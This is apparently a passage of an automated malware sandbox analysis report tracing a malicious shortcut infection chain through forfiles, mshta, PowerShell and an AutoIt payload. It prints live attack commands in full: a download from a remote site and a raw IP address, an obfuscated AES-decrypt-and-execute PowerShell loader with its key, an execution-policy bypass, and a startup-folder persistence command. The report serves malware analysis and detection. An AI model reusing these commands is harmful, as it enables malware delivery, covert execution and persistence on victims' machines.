Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C206C14_2_00007FF74D0C206C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D035F3C14_2_00007FF74D035F3C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B1A1814_2_00007FF74D0B1A18
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D04FA4F14_2_00007FF74D04FA4F
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D06793C14_2_00007FF74D06793C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D03B9F014_2_00007FF74D03B9F0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0DBA0C14_2_00007FF74D0DBA0C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D043C2014_2_00007FF74D043C20
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0DDB1814_2_00007FF74D0DDB18
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C56A014_2_00007FF74D0C56A0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0695B014_2_00007FF74D0695B0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D03183C14_2_00007FF74D03183C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D07184014_2_00007FF74D071840
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0AD87C14_2_00007FF74D0AD87C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0458D014_2_00007FF74D0458D0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D05F8D014_2_00007FF74D05F8D0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D06175014_2_00007FF74D061750
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0E17C014_2_00007FF74D0E17C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C32AC14_2_00007FF74D0C32AC
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D07529C14_2_00007FF74D07529C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D03B39014_2_00007FF74D03B390
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A2B02021_2_00A2B020
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A294E021_2_00A294E0
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A29C8021_2_00A29C80
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A423F521_2_00A423F5
Source: C:\Users\Public\Guard.exeCode function: 21_2_00AA840021_2_00AA8400
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A5650221_2_00A56502
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A2E6F021_2_00A2E6F0
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A5265E21_2_00A5265E
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4282A21_2_00A4282A
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A589BF21_2_00A589BF
Source: C:\Users\Public\Guard.exeCode function: 21_2_00AA0A3A21_2_00AA0A3A
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A56A7421_2_00A56A74
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A30BE021_2_00A30BE0
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A7EDB221_2_00A7EDB2
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4CD5121_2_00A4CD51
Source: C:\Users\Public\Guard.exeCode function: 21_2_00AA0EB721_2_00AA0EB7
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A88E4421_2_00A88E44
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A56FE621_2_00A56FE6
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A433B721_2_00A433B7
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4F40921_2_00A4F409
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A3D45D21_2_00A3D45D
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A2F6A021_2_00A2F6A0
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A416B421_2_00A416B4
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A3F62821_2_00A3F628
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A2166321_2_00A21663
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A478C321_2_00A478C3
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4DBA521_2_00A4DBA5
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A41BA821_2_00A41BA8
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A59CE521_2_00A59CE5
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A3DD2821_2_00A3DD28
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A41FC021_2_00A41FC0
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A4BFD621_2_00A4BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F1B02027_2_00F1B020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F194E027_2_00F194E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F19C8027_2_00F19C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F323F527_2_00F323F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F9840027_2_00F98400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F4650227_2_00F46502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F1E6F027_2_00F1E6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F4265E27_2_00F4265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3282A27_2_00F3282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F489BF27_2_00F489BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F46A7427_2_00F46A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F90A3A27_2_00F90A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F20BE027_2_00F20BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F6EDB227_2_00F6EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3CD5127_2_00F3CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F90EB727_2_00F90EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F78E4427_2_00F78E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F46FE627_2_00F46FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F333B727_2_00F333B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F2D45D27_2_00F2D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3F40927_2_00F3F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F316B427_2_00F316B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F1F6A027_2_00F1F6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F1166327_2_00F11663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F2F62827_2_00F2F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F378C327_2_00F378C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3DBA527_2_00F3DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F31BA827_2_00F31BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F49CE527_2_00F49CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F2DD2827_2_00F2DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F3BFD627_2_00F3BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F31FC027_2_00F31FC0
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00F21A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00F38B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00F30D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00A48B30 appears 42 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00A40D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00A31A36 appears 34 times
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: String function: 00007FF74D058D58 appears 76 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2896
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2896Jump to behavior
Source: Process Memory Space: powershell.exe PID: 8128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winLNK@41/73@8/3
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B3778 GetLastError,FormatMessageW,14_2_00007FF74D0B3778
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09CCE0 AdjustTokenPrivileges,CloseHandle,14_2_00007FF74D09CCE0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,14_2_00007FF74D09D5CC
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A78DE9 AdjustTokenPrivileges,CloseHandle,21_2_00A78DE9
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A79399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,21_2_00A79399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F68DE9 AdjustTokenPrivileges,CloseHandle,27_2_00F68DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F69399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,27_2_00F69399
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,14_2_00007FF74D0B59D8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0CEB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,14_2_00007FF74D0CEB34
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B6D04 CoInitialize,CoCreateInstance,CoUninitialize,14_2_00007FF74D0B6D04
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D036580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,14_2_00007FF74D036580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\duydemo[1]Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:508:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvqxrath.hyb.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1652,i,1199563268995675022,292876181194953866,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\BFmcYQ.exe "C:\Users\user\AppData\Roaming\BFmcYQ.exe"
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/duydemoJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemoJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\BFmcYQ.exe "C:\Users\user\AppData\Roaming\BFmcYQ.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1652,i,1199563268995675022,292876181194953866,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
